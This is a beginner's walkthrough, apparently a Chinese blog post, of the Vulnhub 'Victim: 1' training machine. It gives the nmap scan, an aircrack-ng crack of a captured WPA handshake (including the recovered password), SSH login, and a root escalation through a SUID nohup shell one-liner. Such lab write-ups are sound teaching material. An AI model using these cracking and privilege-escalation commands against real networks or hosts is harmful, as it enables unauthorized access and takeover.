@TOC
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。
Vulnhub靶机下载:
https://www.vulnhub.com/entry/victim-1,469/
Vulnhub靶机安装:
下载好了把安装包解压 然后使用Oracle打开即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover发现主机
渗透机:kali IP :192.168.0.102 靶机IP :192.168.0.101
使用命令:
nmap -sS -sV -A -n -p- 192.168.0.101
*发现开启了22,80,8080,8999,9000端口 dirb扫一下80和8080发现都是403和404页面没啥可以利用的信息*
在扫一下8999 发现是一个WordPress 进行访问,顺便在看看robots.txt 没有可用信息!
这里发现了一个WPA-01数据包保存下载进行分析 发现协议是802.11(无线网协议) 找SSID每个无线网都有自己的。
②:Aircrack-ng破解wifi密码:
使用工具 aircrack-ng进行WIFI破解 得到密码:p4ssword
aircrack-ng -w rockyou.txt WPA-01.cap 
③:SSH登入:
ssh dlink@192.168.0.101 
④:nohup-SUID提权:
使用命令:find / -perm -u=s -type f 2>/dev/null 找可以拥有suid(root)权限的
sudo -l #发现没有可以利用的
尝试nohup命令 先查询一下怎么使用:https://gtfobins.github.io/gtfobins/nohup/
- -p是用root的权限运行sh.
- -c 是执行命令
- <$(tty) >$(tty) 2>$(tty)是终端输入2是标准输出
nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
⑤:获取flag:
至此获取到了flag,渗透测试结束。
Vulnhub靶机渗透总结:
这个靶机的类型也是第一次做,比较简单。
**1.信息收集 获取ip地址 和端口信息
2.Aircrack-ng工具的使用,破解wifi密码
3.nohup-SUID提权**
希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
